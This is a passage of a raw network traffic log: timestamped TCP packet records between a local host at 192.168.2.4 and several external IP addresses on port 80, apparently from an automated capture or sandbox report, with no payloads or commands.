                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:43.870879889 CEST8049770211.1.226.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:43.871025085 CEST4977080192.168.2.4211.1.226.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:43.917751074 CEST4977080192.168.2.4211.1.226.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.098819017 CEST804976374.208.236.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.099039078 CEST4976380192.168.2.474.208.236.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.195458889 CEST8049770211.1.226.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.195542097 CEST8049770211.1.226.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.195719004 CEST4977080192.168.2.4211.1.226.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.277312040 CEST4977080192.168.2.4211.1.226.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.512190104 CEST4977180192.168.2.466.94.119.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.554905891 CEST8049770211.1.226.67192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.555114985 CEST4977080192.168.2.4211.1.226.67
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.638514996 CEST804977166.94.119.160192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.638614893 CEST4977180192.168.2.466.94.119.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.653271914 CEST4977180192.168.2.466.94.119.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.779223919 CEST804977166.94.119.160192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.779889107 CEST804977166.94.119.160192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.780038118 CEST4977180192.168.2.466.94.119.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.903372049 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.904633999 CEST4977180192.168.2.466.94.119.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.919672012 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.919837952 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.949934959 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:44.966758013 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.031733036 CEST804977166.94.119.160192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.031877041 CEST4977180192.168.2.466.94.119.160
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.603496075 CEST8049744104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.603650093 CEST4974480192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.620471954 CEST4977380192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.824065924 CEST8049773122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.824295998 CEST4977380192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.839839935 CEST4977380192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971632004 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971681118 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971713066 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971745014 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971775055 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971781969 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971782923 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971810102 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971853018 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971853018 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971853971 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971889973 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971904039 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971921921 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971931934 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971956968 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971957922 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.971982002 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.972024918 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.972353935 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.972408056 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.972434044 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.972439051 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.972465038 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.972474098 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.972506046 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.972507954 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.972532034 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.972598076 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.973340988 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.973376989 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.973409891 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.973432064 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.973443031 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.973464966 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.973464966 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.973476887 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.973503113 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.973613977 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.974220037 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.974293947 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.974298954 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.974332094 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.974364996 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.974368095 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.974396944 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.974397898 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.974425077 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.974535942 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.975239038 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.975274086 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.975306034 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.975315094 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.975339890 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.975342989 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.975364923 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.975372076 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.975395918 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.975462914 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.988114119 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.988164902 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.988260984 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.988260984 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.988362074 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.988404989 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.988445044 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.988447905 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.988477945 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.988492966 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.988507032 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.988537073 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.988559961 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.988590002 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.989214897 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.989258051 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.989295959 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.989300013 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.989326954 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.989341974 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.989367008 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.989384890 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.989404917 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.989500046 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.990166903 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.990211964 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.990243912 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.990256071 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.990268946 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.990299940 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.990320921 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.990344048 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.990371943 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.990406990 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.991107941 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.991159916 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.991199017 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.991208076 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.991226912 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.991255999 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.991272926 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.991305113 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.991321087 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.991369009 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.992131948 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.992180109 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.992204905 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.992228031 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.992234945 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.992299080 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.992299080 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.992347956 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.992363930 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.992413044 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.993051052 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.993100882 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.993132114 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.993149042 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.993158102 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.993195057 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.993211031 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.993243933 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.993261099 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.993311882 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.993978977 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.994028091 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.994050980 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.994074106 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.994082928 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.994118929 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.994137049 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.994163990 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.994182110 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.994235039 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.994940996 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.994992018 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.995013952 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.995039940 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.995047092 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.995088100 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.995101929 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.995136976 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.995150089 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.995203972 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.995879889 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.995929003 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.995954990 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.995975971 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.995991945 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.996053934 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.996468067 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.996515989 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.996536970 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.996562958 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.996570110 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.996611118 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.996627092 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.996659040 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.996665001 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.996716022 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.997431040 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.997478008 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.997503996 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.997524977 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.997539043 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.997570992 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.997590065 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.997620106 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.997637033 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.997684956 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.998402119 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.998467922 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.998512983 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.998529911 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.998562098 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.998570919 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.998570919 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.998610973 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.998625040 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:45.998677015 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.004699945 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.004740000 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.004815102 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.004815102 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.004988909 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.005028009 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.005058050 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.005064964 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.005084991 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.005103111 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.005136967 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.005141020 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.005162954 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.005211115 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.005824089 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.005892992 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.005911112 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.005960941 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.005980968 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.006012917 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.006026030 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.006051064 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.006083965 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.006110907 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.006716967 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.006769896 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.006789923 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.006834984 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.006902933 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.006942987 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.006970882 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.006980896 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.006994009 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.007049084 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.007683039 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.007720947 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.007757902 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.007781982 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.007791042 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.007827044 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.007858992 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.007863998 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.007883072 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.007935047 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.012450933 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.012499094 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.012531996 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.012547970 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.012556076 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.012593031 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.012614965 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.012643099 CEST8049772172.67.70.223192.168.2.4
